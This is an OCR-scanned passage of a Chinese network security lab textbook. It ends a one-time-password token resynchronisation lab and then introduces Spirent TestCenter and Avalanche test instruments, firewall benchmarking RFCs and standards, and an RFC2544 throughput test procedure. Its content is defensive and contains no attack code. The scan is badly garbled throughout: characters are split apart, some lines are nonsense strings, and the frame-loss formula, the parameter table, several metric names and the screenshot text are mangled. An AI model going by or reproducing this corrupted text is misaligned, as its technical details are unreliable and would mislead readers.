同步 】 选 项 前 面 的 对 钓 取消 ; 在 【服务 器 IP】 中 填写 WinOtp 服务 器 所 在 主机 的 IP 地 址 ; 
端口 号 】 中 为 默认 值 ， 不 可 修改 ;【 用 户 名 】 填 入 添加 新 用 户 时 指定 的 用 户 ID;【 动 态 
口令 】 中 填 入 从 硬件 令 牌 读 取 的 6 位 口令 ;【 重 同步 口令 】 用 来 做 重 同步 ， 此 步 中 不 用 填 
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写 。 填 写 完成 后 ， 单 击 【确定 】 按 钮 。 
A 基于 事件 一 次 性 口令 客户 妆 


192 .168 . 0 .103 


: [i812 


1 [zhengi23 
1 [123456 


图 17-78 ”认证 客户 端 


(3) 观察 “返回 结果 ”中 的 认证 结果 提示 ， 如果 提 示 “ 认 证 成 功 ”， 则 本 次 认证 通过 。 

(4) 用 已 认证 成 功 的 动态 口令 再 次 以 步骤 (2) 同样 的 方法 重新 进行 认证 , 则 提示 “ 认 
证 失败 ” 说明 动态 口令 只 能 成 功 认 证 一 次 。 

3. 令 牌 重 同步 

(1) 开启 硬件 令 牌 ,输入 正确 的 硬件 PIN 码 ， 连 续 单 击 硬件 令 牌 上 的 Enter 按钮 6 一 
10 次 后 读 取 动 态 口 令 ， 并 用 此 口令 进行 前 述 认证 过 程 ， 认 证 结果 为 失败 ， 此 时 ， 硬 件 令 
牌 已 与 认证 服务 器 发 生 失 步 ， 应 当 进 行 重 同步 。 

(2) 单 击 硬件 令 牌 上 的 Enter 按钮 ， 按 顺序 记录 连续 两 次 产生 的 动态 口令 。 

(3) 单 击 【开始 】| 【程序 】|OtpClient， 出 现 如 图 17-78 所 示 的 认证 客户 端 ， 将 【 重 
同步 】 选 项 前 面 的 对 钓 选中 ; 在 【服务 器 IP】 中 填写 WinOtp 服务 器 所 在 主机 的 IP 地 址 ; 
【端口 号 】 为 默认 值 ， 不 可 修改 ;【 用 户 名 】 填 入 添加 新 用 户 时 指定 的 用 户 ID: ES 
令 】 中 填写 步骤 (2) 记录 的 两 个 动态 口令 中 的 前 一 个 ;:【 重 同步 口令 】 中 填写 后 一 个 
完成 后 ， 单 击 【确定 】 按 钮 。 

(4) 观察 “返回 结果 ”中 的 认证 结果 提示 ， 如 果 提 示 “ 认 证 成 功 ” 则 表示 重 同步 
成 功 。 

注意 : 在 步骤 (3 ) 中 的 两 个 动态 口令 必须 按 顺序 输入 ， 否 则 ， 重 同步 无 法 完成 。 

4. OTP 动态 链接 库 调用 

(1) 利用 VS 2005 新 建 Win32 控制 台 应 用 程序 ， 加 载 Resyn.dll 文件 。 

(2) Resyn.dll 文件 中 封装 唯一 函数 resyn()， 具 体 说 明 如 下 。 

C 函数 功能 

以 用 户 的 令 牌 序列 号 tokensn 和 连续 输入 的 两 个 动态 口令 为 传 入 参数 ， 经 过 重 同步 
计算 ， 返 回 重 同 步 的 结果 并 返回 重 同步 后 该 用 户 的 counter 值 。 

Q 函数 名 及 参数 。 


Bool resyn(char *tokensn, 
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char *otpl, 
char *otp2, 


unsigned int *counter); 


@ 参数 列表 ， 如 表 17-1 所 示 。 


表 17-1 参数 列表 
2 Hu Hi R 备注 
[in]char *token num 用 户 令 牌 的 序列 号 固定 长 度 为 11 
[in] char *otpl 固定 长 度 为 6 
mtm MERENS 
[out] unsigned int *counter 经 过 计算 返回 的 counter ffi 数组 长 度 为 2 


同步 
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G) 按 如 上 说 明 书 写 一 段 代 码 ， 实 现 对 Resyn.dll 动态 链接 库 的 调用 ， 并 返回 重 同步 
的 counter 值 ，token_num 为 令 牌 上 的 11 位 序列 号 值 。 
(D 打开 动态 口令 令 牌 ， 得 到 两 个 连续 6 位 的 动态 口令 ， 分 别 赋予 otp1、otp2。 


(5) 编译 并 执行 程序 ， 观 察 返 回 的 counter 值 ， 记 为 counter1 。 


(6) 再 次 打开 令 牌 得 到 两 个 连续 6 位 的 动态 口令 ， 分 别 赋予 otp1、otp2， 编 译 并 执 
行程 序 ， 观 察 返 回 的 counter 值 ， 记 为 counter 2， 比 较 counter! 和 counter2 的 值 ， 验 证 重 


是 否 成 功 。 
【实验 报告 】 


(1) 叙述 OTP 认证 系统 的 基本 原理 和 各 组 成 部 分 的 基本 功能 。 


(2) 分 析 硬 件 令 牌 和 认证 服务 器 之 间 的 口令 同步 关系 。 

(3) 调用 Resyn.dll 动态 链接 库 的 代码 及 验证 重 同 步 的 结果 。 
【思考 题 】 

(1) 思考 OTP 认证 系统 的 应 用 领域 和 应 用 场景 。 

(2) 分 析 重 同步 的 不 同 实现 方法 。 
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目前 ， 市 场 上 有 各 种 各 样 的 网 络 安全 设备 ， 例 如 防火 墙 、IDS、VPN 以 及 身份 认证 
等 安全 产品 。 厂 家 出 于 商业 目的 ， 往 往 对 自己 的 产品 进行 华而不实 的 市 场 宣 传 。 作 为 用 
户 来 说 ， 网 管 员 希望 知道 所 购 产品 的 真实 性 能 指标 ; 而 对 于 产品 开发 工程 师 来 说 ， 他 们 
要 使 用 专用 的 网 络 安全 测试 仪器 来 测试 网 络 安全 设备 的 性 能 指标 ， 以 便 对 网 络 安全 设备 
的 性 能 进行 评估 ， 从 而 判断 产品 在 设计 上 是 否 达到 了 预期 的 目标 。 网 络 测试 的 工具 主要 
以 测试 软件 和 具有 专门 硬件 平台 的 测试 仪表 为 主 ， 测 试 软件 适用 于 一 般 的 功能 及 一 致 性 
测试 ， 其 特点 是 便于 安装 、 使 用 灵活 并 且 成 本 较 低 ， 缺 点 是 测试 软件 受用 户主 机 本 身 性 
能 影响 较 大 ， 不 太 适用 于 网 络 “ 压 力 ” 测 试 ， 测 试 结果 和 实际 网 络 应 用 有 较 大 差距 ， 而 
以 专门 硬件 为 平台 的 测试 仪表 由 于 采用 了 高 速 的 ASIC 或 FPGA， 使 得 测试 流量 在 发 送 
方向 及 接收 统计 方向 都 能 够 达到 线 速 〈Line-rate)， 从 而 满足 了 网 络 性 能 测试 的 要 求 。 现 
在 国内 外 主流 的 网 络 设备 制造 厂商 、 网 络 营运 商 及 科研 机 构 都 采用 测试 仪表 进行 网 络 设 
备 及 网 络 性 能 的 分 析 与 评估 。 

在 本 章 中 ， 作 者 选择 了 当今 最 流行 的 两 种 网 络 安全 专用 测试 仪器 介绍 给 大 家 。 相 信 
读者 通过 练习 本 章 的 实验 ， 能 够 熟练 掌握 网 络 安全 设备 的 基本 测试 方法 ， 为 在 今后 工作 
中 使 用 这 些 专用 测试 仪器 打下 坚实 的 基础 。 
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18.1.1 Bi Spirent TestCenter 数据 网 络 测试 平台 


思 博 伦 通 信 CSpirent Communications) 的 Spirent TestCenter 测试 系统 主要 适用 于 网 
42~7 层 的 测试 ， 包 括 : 
e 核心 及 边缘 路 由 器 的 MPLS-VPN, 二 层 VPNs, 组 播 路 由 ,IPv4/IPv6 路 由 协议 的 
相关 测试 
e 2 层 及 3 层 交 换 机 的 VLANs, RFC2544/2889, STP/RSTP/MSTP, MEF 的 相关 
测试 。 
e 接 入 及 汇聚 的 DHCP/PPP/SIP 仿真 、IPTV 频道 切换 和 视频 质量 测试 。 
e 4—7 层 网 络 应 用 流量 如 HTTP, FTP 等 的 仿真 测试 。 
Spirent TestCenter 测试 仪表 被 广泛 地 采用 于 运营 商 网 络 性 能 评估 及 运 维 ， 设 备 制造 
商 的 网 络 产品 开发 验证 性 能 改进 ， 研 究 机 构 及 与 网 络 相 关 的 科研 领域 。 
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Spirent TestCenter 测试 系统 由 硬件 和 软件 组 成 ， 其 中 硬件 包括 测试 机 箱 及 测试 板 卡 ， 
目前 Spirent TestCenter 主要 有 以 下 两 种 机 箱 ， 如 图 18-1 所 示 。 


图 18-1 Spirent TestCenter 的 2U 与 9U 机 箱 


1. 2U 机 箱 SPT-2000 / 2000HS 

该 型 机 箱 为 便携 机 箱 , 标准 的 2U 尺寸 ,可 装载 两 块 测试 板 卡 ,最 多 支持 24 个 千 兆 (GbE) 
测试 端口 或 16 个 万 兆 (10GbE) 测 试 端口 ， 提 供 静 音 风 冷 系 统 ， 测 试 板块 均 支 持 热 插 拔 。 

2. 9U 机 箱 SPT-9000 

该 机 箱 为 高 密度 机 箱 ， 标 准 的 9U 尺寸 ， 可 装载 12 块 测试 板 卡 ， 最 多 支持 144 个 千 
JE (GbE) 端口 或 96 个 万 兆 (10GbE) 测 试 端口 ， 有 三 组 电源 模块 可 实现 热 备 份 和 在 线 更 
换 。 前 面板 提供 LCD 显示 屏 ， 可 以 显示 诸如 机 箱 IP 地 址 、 测 试 系统 温度 等 信息 ， 测 试 
板 卡 均 支 持 热 插 拔 。 高 密度 机 箱 背 板 提 供 48G 的 交换 容量 ， 可 以 轻松 地 应 对 大 规模 复杂 
测试 过 程 中 产生 的 实时 测试 结果 。 

以 上 两 种 Spirent TestCenter 机 箱 均 支 持 多 用 户 登 录 同 一 个 机 箱 进行 测试 工作 ， 通 过 
这 种 方式 能 更 加 高 效 地 使 用 测试 仪表 资源 ， 方 便 测 试 工程 师 同时 开展 不 同 的 测试 任务 而 
彼此 之 间 不 互相 影响 。 

Spirent TestCenter 测试 系统 采用 C-S 模式 ， 如 图 18-2 所 示 。Spirent TestCenter 
Application 为 测试 的 客户 端 软件 ， 安 装 在 各 用 户主 机 (PC) 上， 用 户 通过 该 软件 连接 并 
控制 Spirent TestCenter 测试 仪表 。 


Spirent TestCenter Chassis 


User 1 


User 2 


Usern 


图 18-2 ”测试 系统 示意 图 


298 


es 第 18 章 网 络 安全 测试 仪器 m 


除了 机 箱 外 ，Spirent TestCenter 测试 系统 还 具有 种 类 繁多 的 测试 板 卡 ， 这 些 测试 板 
卡 具 有 非常 丰富 的 测试 特性 ,可 以 支持 多 种 协议 。 这 些 测试 板 卡 支持 以 太 网 、 POS. ATM 
等 多 种 接口 。 本 教材 配套 实验 环境 使 用 的 为 12 端口 的 以 太 网 测试 板 卡 ， 如 图 18-3 所 示 。 
该 测试 板 卡 为 光电 互 斥 型 双 介质 板 卡 ， 是 目前 在 Spirent TestCenter 上 密度 最 高 的 测试 板 
卡 ， 并 且 每 个 测试 端口 均 有 独立 的 CPU 进行 路 由 或 应 用 层 协 议 仿真 。 
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图 18-3 12 端口 的 以 太 网 测试 板 卡 


Spirent TestCenter 测试 仪表 的 内 部 架构 如 图 18-4 所 示 。 可 以 将 每 块 测试 板 卡 看 成 是 
一 台 交 换 机 ， 它 们 和 仪表 机 箱 控制 卡 上 的 主 交换 机 通过 管理 背 板 进行 双向 的 通信 ， 从 机 
箱 控制 卡 到 测试 板 卡 的 通信 主要 实现 测试 配置 的 下 发 及 管理 ， 从 测试 板 卡 到 机 箱 控制 卡 
的 通信 主要 实现 测试 状态 及 测试 结果 的 实时 上 传 等 。 由 于 Spirent TestCenter 测试 仪表 管 
理 背 板 的 交换 容量 为 10G， 所 以 即使 是 满载 情况 下 也 能 保证 配置 下 发 及 结果 上 传 的 无 阻 


Por CPU 
Tae Port CPU 
以 太 网 交换 机 Port CPU 
Port CPU 


[1 Port CPU 
Ice Port CPU 
以 太 网 交换 机 | | portGEU 
L Port CPU 


Gy 机 箱 控制 卡 


以 太 网 
交换 机 


[| Port CPU 
Seared Port CPU 
以 太 网 交换 Port CPU 
LT Port CPU 


Port CPU 
EG Port CPU 
J | 以 大 网 交换 Port CPU 
UJ Port CPU 


管理 背 板 测试 板 卡 


机 箱 IP 地 址 


图 18-4 Spirent TestCenter 测试 仪表 的 内 部 架构 


18.1.2 思 博 伦 Avalanche 网 络 应 用 与 安全 测试 仪 

思 博 伦 通信 的 Avalanche 产品 系列 是 目前 业内 最 先进 的 网 络 应 用 层 (4~7 层 ) 仿真 
及 安全 测试 工具 。Avalanche 可 以 仿真 客户 端 和 服务 器 端 , 测试 网 络 承载 设备 , 如 防火 墙 、 
负载 均衡 、IDS/IPS/UTM 设备 、 业 务 识别 DPI 设备 等 ，Avalanche 也 可 以 只 仿真 客户 端 ， 
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测试 现 网 服务 器 ， 如 Portal 服务 器 、 邮 件 服务 器 、 媒 体 服务 器 ， 以 及 IPSEC/SSL 安全 网 
X. Avalanche 通过 准确 地 仿真 用 户 和 网 络 行为 ， 帮 助 用 户 确保 可 靠 的 安全 性 和 最 佳 的 应 
用 性 能 。Avalanche 可 为 企业 网 络 运营 商 、 设 备 制 造 商 和 服务 提供 商 提供 一 种 理想 的 测试 
策略 ， 这 种 客户 端 与 服务 器 端 相 结合 的 测试 方法 给 予 了 可 靠 的 、 可 计量 的 测试 性 能 极限 
的 方法 ， 可 被 用 来 测试 单独 的 设备 和 网 络 性 能 。 

Avalanche 产品 系列 拥有 业内 最 高 的 应 用 层 性 能 ， 可 以 超过 20Gb/s 速率 ， 可 以 生成 
超过 每 秒 钟 SO 万 个 HTTP 1.0 请 求 ， 使 用 IP 和 MAC 仿真， 可 以 模拟 超过 3000 万 个 并 
发 连接 ， 每 个 连接 都 源 自 不 同 子 网 上 不 同 的 IP 地 址 和 /或 不 同 的 MAC 地 址 。Avalanche 
可 以 仿真 各 种 应 用 层 攻击 ， 如 各 类 病毒 、 蠕 虫 、 后 门 、 应 用 渗透 等 ， 每 秒 发 起 几 十 万 次 
攻击 ， 评 估 网 络 设备 的 漏洞 和 脆弱 性 。 

j 户 可 以 最 多 将 24 台 Avalanche 级 联 构成 超 高 性 能 集群 测试 系统 Avalanche Cluster, 
以 极 高 的 性 能 对 现 网 或 者 实验 网 络 进行 仿真 ， 对 现 网 应 用 层 承 载 设 备 或 现 网 服务 器 进行 
性 能 和 稳定 性 测试 。 

Avalanche 产品 系列 在 国际 上 先后 获得 过 2001 年 Internet World 的 “Best of Show”, 

2010 年 Network+Interop 的 “Best of Show” EK, WK 18-5 所 示 。 


E INTEROP 2010 
> N 
f£ WINNER "acr startup PRODUCT Parlormance 
| BEST OF SHOW | BEST OF SHOW Optimization 
NU | NETWORLDINTEROP | NETWwRLD INTEROP 


| Rey mm co | Exi, wa cre | soe | T 


图 18-5 Avalanche 产品 获得 多 项 业内 大 奖 


使 用 Avalanche 客户 端 可 以 测试 各 种 服务 器 , 如 Web 服务 器 、 电 子 邮件 服务 器 、FTP 
服务 器 、DNS 服务 器 、Telnet 服务 器 、 流 媒体 服务 器 、 应 用 服务 器 、 PPPoE 服务 器 、DHCP 
服务 器 、NAS 服务 器 (网 络 附加 存储 ) HTTP 自 适应 流 服务 器 (HTTP Adaptive Streaming) 
等 ， 还 可 以 测试 内 容 分 发 网 络 (CDN)、 服 务 提 供 商 和 网 络 运营 商 的 业务 网 络 等 。 

通过 将 Avalanche 客户 端 和 Avalanche 服务 端 相 结合 可 以 测试 防火 墙 .IDS/IPS IPSec 
VPN 设备 、SSL VPN 设备 、DPI 设备 、UTM 设备 、 应 用 层 交 换 机 、 负 载 均衡 设备 、 网 
络 缓存 、 垃 圾 邮件 过 滤 系 统 、 防 病毒 系统 、 代 理 服务 器 及 其 他 应 用 网 关 等 网 络 设备 等 ， 
也 可 以 进行 网 络 场景 模拟 测试 ， 仿 真 数据 业务 (如 Web，FTP，DNS 等 )、 流 媒体 业务 、 
语音 业务 、P2P 流 、MSN/QQ “ Messenger 应 用 ， 以 及 各 种 私有 业务 。 通 过 不 同 场景 的 
仿真 ， 复 制 复杂 环境 到 实验 室 ， 确 保 测试 与 现实 环境 的 一 致 性 。 

Avalanche 3100 的 外 观 如 图 18-6 所 示 。Avalanche 290 的 外 观 如 图 18-7 所 示 。 


图 18-6 Avalanche 3100 的 外 观 
图 18-7 Avalanche 290 的 外 观 
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182 防火墙 性 能 测试 简介 


18.2.1 防火 墙 基准 性 能 测试 方法 学 概述 

RFC (Request For Comments) 是 一 系列 以 编号 排 定 的 文件 。 文件 收集 了 有 关 互 联网 
相关 信息 ， 以 及 UNIX 和 互联 网 社区 的 软件 文件 。 目 前 RFC 文件 是 由 Internet Society 
ASOC) 赞助 发 行 。 基 本 的 互联 网 通信 协议 都 在 REC 文件 内 有 详细 说 明 。RFC 文件 还 额 
外 加 入 许多 的 论题 在 标准 内 ， 例 如 对 于 互联 网 新 开发 的 协议 及 发 展 中 所 有 的 记录 。 因 此 
几乎 所 有 的 互联 网 标准 都 收录 在 RFC 文件 之 中 。 

IETF(The Internet Engineering Task Force)， 又 称 互 联网 工程 任务 组 ， 成 立 于 1985 年 
年 底 ， 是 全 球 互联 网 最 具 权威 的 技术 标准 化 组 织 ， 主 要 任务 是 负责 互联 网 相关 技术 规范 
的 研发 和 制定 ， 当 前 绝 大 多 数 国际 互联 网 技术 标准 均 出 自 IETF。 

目前 ， 国 际 上 与 防火 墙 基准 性 能 测试 相关 的 标准 RFC 有 以 下 5 个。 

RFC1242 (Benchmarking Terminology for Network Interconnection Devices) 

RFC2544 (Benchmarking Methodology for Network Interconnect Devices ) 

RFC2647 (Benchmarking Terminology for Firewall Performance ) 

RFC2979 (Behavior of and Requirements for Internet Firewalls) 

RFC3511 (Benchmarking Methodology for Firewall Performance ) 

其 中 ，RFC1242 和 RFC2647 描述 的 是 基准 测试 术语 ，RFC2544 和 RFC3511 则 描述 
相应 的 基准 测试 方法 。 

在 这 4 个 RFC 中 ，RFC1242/RFC2544 适用 于 所 有 网 络 连 接 设 备 (包括 防火 墙 )， 主 
要 包括 6 个 基准 性 能 测试 指标 : 吞吐 量 (Throughput), 4ER (Latency), ZW (Frame 
Loss Rate)、 背 靠背 (Back-to-back), AZ (System Recovery) 和 重启 (Reset). 
RFC2647/RFC3511 是 专门 的 防火 墙 基准 性 能 测试 标准 ， 包 括 10 个 性 能 测试 指标 : 
RFCI242/RFC2544 中 的 两 个 网 络 层 测试 指标 ， 即 吞吐 量 、 延 迟 ， 三 个 传输 层 测 试 指标 ， 
即 并 发 TCP 连接 能 力 〈(Concurrent TCP Connection Capacity)、 最 大 TCP 连接 速率 
(Maximum TCP Connection Rate)、 最 大 TCP 拆除 速率 (Maximum TCP Tear Down Rate); 
两 个 应 用 层 测试 指标 ， 即 HTTP 传输 速率 CHTTP Transfer Rate)、 最 大 HTTP 事务 处 理 
速率 (Maximum HTTP Transaction Rate); 三 个 专门 针对 防火 墙 的 测试 指标 ， 即 拒绝 服务 
Ab#E (Denial of Service Handling)、 非 法 数据 流 处 理 CIllegal Traffic Handling), IP 分 片 
处 理 (IP Fragmentation Handling). 


18.22 ”防火 墙 设备 相关 国家 标准 介绍 


国内 对 于 防火 墙 设备 的 相关 技术 标准 有 : 
GB/T 18019 一 1999《 信 息 技术 包 过 滤 防 火 墙 的 安全 技术 要 求 》(1999-11-11 批准 ; 
2000-05-01 实施 ) 
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GB/T 18020 一 1999《 信 息 技术 应 用 级 防火 墙 的 安全 技术 要 求 》(1999-11-11 批准 ; 
2000-05-01 实施 ) 

GA 372 一 2001《 防 火 墙 产品 的 安全 功能 检测 》(2001-12-24 KA; 2002-05-01 实施 ) 

GB/T 20010 一 2005《 信 息 安全 技术 包 过 滤 防 火 墙 评 估 准 则 》(2005-11-11 批准 ; 
2006-05-01 实施 ) 

GB/T 20281 一 2006《 信 息 安 全 技术 防火 墙 技术 要 求 和 测试 评价 方法 》(2006-05-31 批 
YE; 2006-12-01 实施 ) 

GAIT 683 一 2007《 信 息 安全 技术 防火 墙 安 全 技术 要 求 )(2007-03-20 发 布 ; 2007-05-01 
实施 ) 

YD/T 1132 一 2001《 防 火 墙 设备 技术 要 求 》(2001-05-25 发 布 ，2001-11-01 实施 ) 

YD/T 1707 一 2007《 防 火 墙 设备 测试 方法 》(2007-09-29 发 布 ， 2008-01-01 实施 ) 

18.3 节 将 对 防火 墙 基准 性 能 测试 方法 及 实验 做 详细 的 阐述 ， 分 为 防火 墙 网 络 层 、 传 
输 层 、 应 用 层 基 准 性 能 测试 以 及 三 个 专门 针对 防火 墙 的 测试 。 


483 ”防火墙 性 能 测试 实践 


18.3.1 防火 墙 三 层 转发 性 能 测试 


【实验 目的 】 

基于 IP 技术 转发 的 防火 墙 一 般 被 称 为 三 层 防 火 墙 ， 因 此 IP 转发 性 能 对 于 防火 墙 的 
整体 性 能 来 说 非常 重要 ， 在 RFC3511 防火 墙 性 能 测试 方法 学 中 ， 防 火 墙 IP 吞吐 量 被 作 
为 第 一 个 需要 衡量 的 性 能 指标 被 提出 来 。 本 实验 的 目的 是 让 读者 了 解 什么 是 IP 吞吐 量 、 
IP 吞吐 量 的 测试 方法 及 如 何 使 用 Spirent TestCenter 进行 三 层 防 火 墙 的 IP 吞吐 量 测试 。 


【原理 简介 】 

1. 吞吐 量 测试 

1) FEREN 

无 丢 包 情况 下 设备 的 最 大 转发 速率 。 

2) 吞吐 量 测试 方法 

测试 仪表 以 初始 速率 向 防火 墙 发 送 一 定数 量 的 帧 ， 然 后 计算 被 防火 墙 转发 的 帧 数 ， 
如 果 接 收 到 的 帧 数 等 于 发 送 的 帧 数 ， 则 提高 发 送 速 率 (在 用 户 设置 的 速率 范围 内 ); 如 果 
接收 到 的 帧 数 小 于 发 送 的 帧 数 , 则 降低 发 送 速 率 (在 用 户 设置 的 速率 范围 内 )。 重复 测量 ， 
直到 查找 到 防火 墙 无 丢 包 情况 下 设备 的 最 大 转发 速率 。 

2. 时 延 测试 

1) 时 延 定义 

A) 存储 转发 设备 的 时 延 (LIFO) 

一 帧 的 最 后 一 比特 进入 输入 端口 到 该 帧 的 第 一 比特 到 达 输 出 端口 的 时 间 间 隔 。 
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(2) 比特 转发 设备 的 时 延 (FIFO) 

一 帧 的 第 一 比特 进入 输入 端口 到 该 帧 的 第 一 比特 到 达 输 出 端口 的 时 间 间 隔 。 

2) 时 延 测 试 方法 

测试 出 不 同 帧 长 的 吞吐 量 ， 以 该 帧 长 的 吞吐 量 发 送 流量 ， 记 录 发 送 时 戳 A 和 接收 时 


BRB, PRESS T-BOUCIN BU AS ALIS IRE REA 


3. FM Mit 
D 丢 帧 率 定 义 
指 路 由 器 在 稳定 状态 负载 下 ， 由 于 缺乏 资源 而 不 能 被 网 络 设备 转发 的 包 占 所 有 应 该 


被 转发 的 包 的 百分比 。 


2) 丢 帧 率 测 试 方法 
以 一 定 速率 发 送 一 定数 量 的 帧 ， 然 后 计算 被 防火 墙 转发 的 帧 数 ， 不 同 测试 点 下 的 丢 


TL — [ (输入 帧 数 一 输 出 帧 数 ) X 10096] / 输入 帧 数 。 


图 18-8 所 示 。 


【实验 环境 】 
此 实验 的 设备 连接 拓扑 图 及 地 址 配置 如 


【实验 步骤 】 
通常 ， 测 试 过 程 由 以 下 若干 阶段 组 成 : 测 Spirent TestCenteriA 
试 环境 的 建立 、 测 试 设置 、 测 试 运行 、 测 试 结 mcm 
果 保 存 与 分 析 。 prd 
1. 测试 环境 的 搭建 — 
参照 图 18-8 完成 相应 的 物理 连接 , 然后 为 Aaa vr ata 


DUT、 测 试 仪表 加 电 。 以 特权 用 户 身份 登录 到 图 18-8 设备 连接 拓扑 图 及 地 址 配置 
被 测 防 火 墙 , 参照 图 18-8 为 防火 墙 的 每 个 接口 
进行 配置 。 


2. 测试 设置 
测试 设置 (Test Setup) 包括 测试 仪 端口 配置 、 主 机 配置 和 向 导 〈Wizard) 设置 三 大 


部 分 。 其 中 ， 向 导 功能 除了 提供 本 测试 相关 的 测试 拓扑 和 测试 流 配置 外 ， 还 提供 了 与 本 
测试 相关 的 负载 、 测 试 帧 长 、 测 试 时 长 、 测 试 次 数 等 主要 测试 参数 的 配置 界面 。 由 于 测 
试 仪表 端口 的 配置 方法 在 前 面 的 实验 中 已 有 介绍 ， 在 此 不 再 重复 。 主 机 配置 可 在 向 导 设 
置 中 一 起 完成 。 因 此 ， 下 面 仅 介绍 RFC2544 向 导 设置 的 有 关内 容 。 


在 主 界面 上 方 的 工具 栏 中 单 击 Wizards 按钮 , 在 所 弹出 的 Wizards 窗口 中 , 选择 Test 


Wizards|RFC2544|Throughput， 如 图 18-9 所 示 。 值 得 注意 的 是 ，RFC2544 测试 向 导 将 会 
自动 创建 主机 。 


进入 RFC2544 Throughput 界面 后 ， 单 击 右 下 角 的 Reset 按钮 ， 清 除 当前 已 经 存在 的 


配置 参数 。 阅 读 完毕 右 方 窗口 中 的 测试 说 明 ， 单 击 Next， 进 入 Select Ports 阶段 , 将 2 个 
端口 全 部 选中 ， 如 图 18-10 所 示 ， 然 后 单 击 Next 按钮 ， 出 现 Configure Traffic 对 话 框 ， 
如 图 18-11 所 示 。 
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$: Select Technologies... 


Results Reporter Pa Wizards... 
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* Configuration Wizards 
- Test Wizards 
Asymmetric Performance Test Package Í 


Alt Ports 


By All Traffic Generators - RÉc2544 
n, All Steam Blacks posal ia Frames 
SB All Traffic Analyzers foals 
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+ Rfc2889 
+ Traffic 


1 Objective 
i 


Tg Settings 


图 18-9 RFC2544 Wizard 的 进入 


Z^ Rfc2544 Throughput - Select Ports 


Steps Pott Selection 
Select Wizard 


Configure Traffic Name Localion Model Meda Status 


回国 pos — //1082018/. 10/100/1000.. EthernetCopper Up 
GBPots — //71082018/. 10/10/1000. EthemetCopper Up 


View 


© Details 


O ua 
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© Addiessing 日 we Biroo 
Ie 
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" 


[ew =] <Back [Ce ] 
图 18-11 Traffic Descriptors 功能 菜单 中 的 Endpoints 参数 设置 
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在 流量 描述 器 〈Traffic Descriptors) 窗口 中 ， 选 择 功能 菜单 中 的 Endpoints 进行 连接 
方式 和 流量 方向 等 的 选择 ， 在 界面 右 侧 选择 Pair，Bidirectional，Create new endpoints, 


One-to-One 和 Stream only generation， 选 择 Port A 为 源 端口 ，Port B 为 目的 端口 ， 然 后 单 
击 Add 按钮 。 


选择 Traffic Descriptors 功能 菜单 中 的 Addressing， 按 照 图 18-12 完成 端口 与 主机 的 
IPv4 和 MAC 地 址 设置 。 


T^ Rtc2544 Throughput - Configure Traffic 


Steps Trafic Contguration Mode @ Automatic O Manual 


EDS Covi ii Tremere] — Deseme — lente vem 
ct Poe 


S @ TraffcDesciplor 1 
Endpoints 


Port Configuration 
[y This table cng Ue stating edes ul the hosts un each pa 


Adáesing 
© IP Header 
[ Skip ilegal and reserved IP addresses 


Start 
(00:10:94:30:00:01 
192.168.11.2 
192.168.11.1 


Host Configuration 
[@ This table assigns the number of addresses and steps within each port 


HostCount [| — $j 


[Parameter Step 
[b MacAddress  00:00:00:00:00:01 
MPs Address — 000.1 


图 18-12 Traffic Descriptors 功能 菜单 中 的 Addressing 参数 设置 


选择 Traffic Descriptors 功能 菜单 中 的 IP Header， 添 加 UDP 为 IP Next Protocol, së 
成 帧 封装 格式 的 设置 。 如 图 18-13 所 示 ， 当 Traffic Descriptors 及 其 展开 式 功能 菜单 前 面 
均 出 现 绿色 通过 标记 时 ， 单 击 Next 按钮 ， 进 入 Test Parameter 设置 阶段 。 


©: Rfc2544 Throughput - Traffic Descriptor 


z Traffic Descriptors IP Next Protocol 
teps 日 
uf Tilicboecipiurt IP next protocol variation IPs Next... Protocol 

Select Wizard J Endpoints Adi» 7 7 
Select Ports Vf Addressing ur s- emot 

è M IP Header 
Traffic Descriptor. « Remove 
Test Parameters 
Test Options «« Remove 


Fd 18-13 Traffic Descriptors 功能 菜单 中 的 IP Header 参数 设置 


如 图 18-14 所 示 Test Parameter 设置 界面 ， 需 要 完成 实验 次 数 (Number of trials) 和 
每 次 测试 时 长 (Trial Duration) 的 设置 、 帧 长 的 设置 和 为 吞吐 量 测试 提供 的 负载 (ILoad) 
变化 范围 及 变化 方式 的 设置 。 根 据 RFC2544 的 建议 ， 吞 吐 量 测试 至 少 维持 60s 的 时 长 ， 
并 且 要 对 RFC2544 所 列 出 的 所 有 帧 长 进行 测试 ， 但 实验 过 程 中 ， 可 以 选择 较 短 的 10s 和 
两 种 帧 长 以 加 快 测试 进程 。 
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Frame Size {bytes} 


| Select Wiad Number of tial: 2. s aia 

| Select Ports Min 
Jiatte dt. 

| Gescuptor Trial Duration: (2 Step 
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intial ate [%} 30 frame bes 1%), 0 
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(Note Non HPL comphant when Acceptable hame loss > U) 


图 18-14 Test Parameters 设置 界面 


完成 这 些 测试 参数 设置 后 ， 单 击 Next 按钮 ， 进 入 测试 选项 的 配置 阶段 ， 如 图 18-15 
所 示 为 Test Options 的 配置 界面 。 注 意 ，Enable Learning 复 选 框 是 被 选中 的 ，Mode 选 定 


Max 


$ End 1508 2 Step 1330 了 


Comma delraled (ag 64128, 258 512:1024 1287 1518] 


Throughout Threshold 
[] Max latency fuc] 


[ ow of sequence. 


为 L3 Leaming， 它 表示 在 运行 测试 之 前 ， 先 要 自动 进行 三 层 地 址 学 习 。 


至 pfc2544 Throughput - Test Options 


dumm Scheduling z 
SeleciWizad Stari traffic dlay(secondt [2 
Select Ports MO Tu i 
Configure Trí gui 
Test Parameters Delay alte: transmission {second} (15S 


[7] Celic address resolution 


[E] Save detailed stream resulte with every teration 


[I Measure Jiter 


图 18-15 Test Options 的 配置 界面 


单 击 Finish 按钮 ， 完 成 Wizard 设置 ， 回 到 主 界面 。 此 时 在 系统 主 界面 右上 角 的 
Command Sequencer 窗口 中 ， 生 成 一 个 形 如 “RFC2544: Throughput Test” 的 命令 ， 如 
图 18-16 所 示 ， 双 击 该 命令 可 以 看 到 前 面 通过 向 导 所 配置 的 内 容 摘 要 。 建 议 将 该 配置 保 


存 为 一 个 文件 ， 文 件 名 可 为 “RFC2544 Throughput Lab”. 
3. 测试 运行 
1) 启动 测试 过 程 


如 图 18-17 所 示 , 在 系统 主 界面 的 右上 角 , 在 Command Sequencer 窗口 中 , 单 击 Start 
sequencer 按钮 ， 开 始 测试 。 在 随后 弹出 的 Results Reporter Integration 提示 对 话 框 中 ， 单 


击 Yes 按钮 ， 如 图 18-18 所 示 。 
2) 观察 测试 日 志 


在 测试 开始 之 后 ， 就 可 以 看 到 实时 的 系统 操作 日 志 〈log) 记录 ， 如 图 18-19 所 示 。 
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Comnand Sequencer 
Edit Sequence... D] Dal 
Command Name 


RFC 2544; Throughput Test 1 


